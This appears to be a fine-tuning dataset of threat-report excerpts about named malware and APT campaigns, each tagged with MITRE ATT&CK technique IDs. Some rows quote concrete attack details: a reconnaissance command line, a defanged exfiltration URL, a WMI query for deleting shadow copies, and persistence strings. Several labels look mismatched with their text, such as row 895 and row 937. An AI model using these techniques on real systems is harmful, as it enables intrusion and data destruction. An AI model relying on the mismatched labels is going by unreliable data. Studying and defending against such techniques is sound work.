859The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7/9/2020['T1584.001 - Domains']fine_tune
860More interesting, however, is that it also contains support for Windows execution via SMB shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote Windows shares and then execute as a service['T1021.002 - Remote Services: SMB/Windows Admin Shares']fine_tune
861One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version['T1082 - System Information Discovery']fine_tune
862It drops ransom notes at various folders in the system and opens one after it has encrypted the data and documents of the victim. As with usual ransomware, it does this to extort money from the victim in exchange for the decryption of their files['T1486 - Data Encrypted for Impact']fine_tune
863Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to a JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details. Stage 1 - Word Macro + Whitelisting Bypass. As with many other campaigns, the victim received a document with malicious Visual Basic macro code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function – this method is used much less frequently than the obvious Document_Open or AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then executes CreateProcess on regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year['T1027 - Obfuscated Files or Information']fine_tune
864Establish persistence for itself on the endpoint - Establish persistence of another component of the malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server['T1070.004 - Indicator Removal on Host: File Deletion', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
865Regularly, the service checks if a user is logged in, by checking if Explorer is running. Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe['T1057 - Process Discovery']fine_tune
866The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing['T1124 - System Time Discovery']fine_tune
867Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
868The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication['T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL']fine_tune
869The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we’ve seen communicate via HTTPS and WebDav with the same server “cloudme.com”, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Linköping, Sweden['T1102 - Web Service']fine_tune
870These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common among malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered—one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22['T1132.001 - Data Encoding: Standard Encoding', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
871Gather all network configuration information and record to a file on disk in a folder created by the implant using the command: cmd.exe /c ipconfig/all >>"%s" & arp -a >>"%s" where %s = <file_path['T1016 - System Network Configuration Discovery']fine_tune
872The overwritten code reads the ransom note string inside the MBR and sets it to appear on the display['T1542.003 - Bootkit']fine_tune
873Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can’t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to an IP address that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
874Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick, EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three APIs’ return values is modified by a system monitoring solution, like a sandbox['T1124 - System Time Discovery']fine_tune
875Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
876CTU analysis of one of GOLD KINGSWOOD's campaigns using SpicyOmelette (DOC2018.js) exposed additional sophisticated methods to compromise targets. A valid digital certificate was used to sign the malicious script. Windows Scripting Host supports the inclusion of digital signatures, and Figure 2 shows how the signature was appended to the script['T1553.002 - Code Signing']fine_tune
877There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others['T1027 - Obfuscated Files or Information']fine_tune
878Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another['T1583.001 - Domains']fine_tune
879After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3['T1482 - Domain Trust Discovery']fine_tune
880Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files['T1204.002 - User Execution: Malicious File']fine_tune
881In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\ partition by overwriting it with fixed data. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable. As a result, there were additional stages and additional payloads that could inflict more damage to end systems['T1561.002 - Disk Structure Wipe']fine_tune
882This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies['T1585.002 - Email Accounts']fine_tune
883This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon’s operators['T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
884The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns['T1584.004 - Server']fine_tune
885APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement['T1505.003 - Server Software Component: Web Shell']fine_tune
886Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The "Blackwater.bas" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub project called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
887Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives['T1080 - Taint Shared Content']fine_tune
888These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware['T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1007 - System Service Discovery']fine_tune
8891) Moving the (malicious) application into the /Users/user/Library/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest['T1036 - Masquerading']fine_tune
890TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware — threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
891The Autorun manager subsystem is responsible for tracking the way that the malicious module starts in the system and it maintains several different methods for starting automatically (shown below): LinkAutorun – The subsystem searches for a LNK file in the target directory, changes the path to "cmd.exe" and the description to ' /q /c start "" "%s" && start "" "%s" '. TaskScheduler20Autorun – The subsystem creates the ITaskService (works only on Windows Vista+) and uses the ITaskService interface to create a new task with a logon trigger. StartupAutorun – The subsystem creates a LNK file in %STARTUP%. ScreenSaverAutorun – The subsystem installs as a current screensaver with a hidden window. HiddenTaskAutorun – The subsystem creates the task ITaskScheduler (works only on pre-Vista NT). The task trigger start date is set to the creation date of the Windows directory. ShellAutorun – Winlogon registry [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] Shell="explorer.exe['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification']fine_tune
892Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim’s machine. Execute the command['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
8931) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move laterally and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information['T1003 - OS Credential Dumping']fine_tune
894In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system['T1105 - Ingress Tool Transfer']fine_tune
895The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2['T1010 - Application Window Discovery']fine_tune
896NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails['T1204.002 - User Execution: Malicious File', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
897In order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script['T1016 - System Network Configuration Discovery']fine_tune
898One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros['T1566.001 - Phishing: Spearphishing Attachment', 'T1027 - Obfuscated Files or Information', 'T1204.002 - User Execution: Malicious File', 'T1221 - Template Injection']fine_tune
899First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration['T1573.001 - Symmetric Cryptography', 'T1546.015 - Event Triggered Execution: Component Object Model Hijacking']fine_tune
900Creates 2 objects in the AD forest Configuration partition. Updates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (AD Replication). More info on Kerberos Service Principal Names in the ADSecurity SPN section. Pushes the updates to DCs via DrsReplicaAdd and KCC['T1207 - Rogue Domain Controller']fine_tune
901The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another’s process token just for the execution of a command['T1134.002 - Create Process with Token']fine_tune
902Then, it reads the dropped file with the .db3 extension, which contains position-independent code, and uses CreateThread to execute its content['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
903The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver['T1105 - Ingress Tool Transfer']fine_tune
904Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports['T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol']fine_tune
905Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process['T1569.002 - System Services: Service Execution']fine_tune
906DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id['T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1047 - Windows Management Instrumentation', 'T1047 - Windows Management Instrumentation']fine_tune
907In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the "net start %s" argument (without quotes), where "%s" is the service name['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
908The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration['T1049 - System Network Connections Discovery']fine_tune
909FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue['T1203 - Exploitation for Client Execution']fine_tune
910In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
911One of the file path name combinations observed was ‘C:\ProgramData\Dacr\macrse.exe’, also configured in a Crimson “Main Client” sample and used for saving the payload received from the C2 when invoking the usbwrm command['T1105 - Ingress Tool Transfer']fine_tune
912In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running on. This is followed by a number of Linux shell command style commands related to the malware establishing persistence['T1082 - System Information Discovery']fine_tune
913Command Number – a running index number to keep track of executed commands. If set to any number other than -1, the backdoor should proceed to execute the command, according to the Command ID. Command ID – can be one of the following commands: 101 – Shell Command: execute the Shell command attached in the {Arg1} argument. 102 – Download File: Downloads a file that can be found on the {Arg2} path on the server, and saves it on the disk with the {Arg1} name. 104 – Shell Command (duplicate): execute the Shell command attached in the {Arg1} argument['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
914Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from Linux-based operating systems. When the Linux binary “winexe” is run against a Windows server, the winexesvc.exe executable is created and installed as a service['T1569.002 - System Services: Service Execution']fine_tune
915CertPKIProvider.dll, tracked by Microsoft as “VaporRage” can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL['T1105 - Ingress Tool Transfer']fine_tune
916On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads['T1583.006 - Web Services', 'T1102 - Web Service', 'T1608.001 - Upload Malware']fine_tune
917Conclusion. The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell script to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group; however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
918Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\Windows\Debug and C:\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification']fine_tune
919After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration['T1560.001 - Archive Collected Data: Archive via Utility']fine_tune
920Distributing the ransomware using spear-phishing and weaponized documents - Bat-files downloading payloads from Pastebin and inject them into a process on the operating system - Compromising RDP and usage of script files and password cracking tools to distribute over the victim’s network - Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware['T1055 - Process Injection']fine_tune
921Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity['T1095 - Non-Application Layer Protocol']fine_tune
922The button would then lead to the download of a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infecting themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report['T1204.001 - Malicious Link']fine_tune
923Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data['T1572 - Protocol Tunneling']fine_tune
924The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
925In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs']fine_tune
926It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp://zeplin.atwebpages.com/inter.php and exfiltrates the ipconfig output gathered from the machine['T1016 - System Network Configuration Discovery']fine_tune
927We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed['T1082 - System Information Discovery']fine_tune
928The use of large size files to avoid detection by security solutions with hardcoded size limits for ‘efficiency’. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling['T1027.001 - Obfuscated Files or Information: Binary Padding']fine_tune
929In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1['T1027 - Obfuscated Files or Information']fine_tune
930The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed['T1204.001 - Malicious Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
931Aria-body starts with gathering data on the victim’s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com['T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery']fine_tune
932yty”, the name we use for the framework, from the PDB path string. A “bot id” consisting of computer name, user name, and volume serial number separated by dashes['T1082 - System Information Discovery']fine_tune
933Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe. Next, it creates the service and runs it['T1012 - Query Registry', 'T1569.002 - System Services: Service Execution']fine_tune
934The wiper could be configured to use a file to overwrite the files on the disk using the ‘F’ configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named ‘GRANT’, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5['T1561.002 - Disk Structure Wipe']fine_tune
935This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the exfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn’t encode the stolen data or store the data in sessionStorage before the exfiltration['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol']fine_tune
936The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload['T1027 - Obfuscated Files or Information']fine_tune
937After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
938If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic['T1029 - Scheduled Transfer']fine_tune
939In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority['T1082 - System Information Discovery', 'T1566.001 - Phishing: Spearphishing Attachment']fine_tune
940"m": mode: net or local. local - encrypt local drives only and ignore network shares. "h": path to a file that contains specific hosts (names and IPs) to enumerate for shares. "s": IP address that the initial register message will be sent to['T1016 - System Network Configuration Discovery']fine_tune
941FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it "FINcoding". These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
942The kill_unwanted function gets a list of running processes and compares each process with an encrypted list of “unwanted” programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings to ascertain the value of the “unwanted” programs['T1057 - Process Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1518.001 - Software Discovery: Security Software Discovery']fine_tune
943Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details Of The Attacks . Our examination of the acquired samples shows hackers generally use two main methods of “Sending Fake SMS” and “Sending Fake Emails” to execute their attacks. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email . Another method used in this phishing campaign is sending fake emails with deceptive titles like “Merry Christmas, and sending note/book/photo and others”, which are usually sent by previously hacked emails. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email’s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of fake email after sending the initial email to the target . Redirect Chain . Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten’s phishing campaign and that this campaign has significantly intensified in recent days['T1566.002 - Phishing: Spearphishing Link']fine_tune
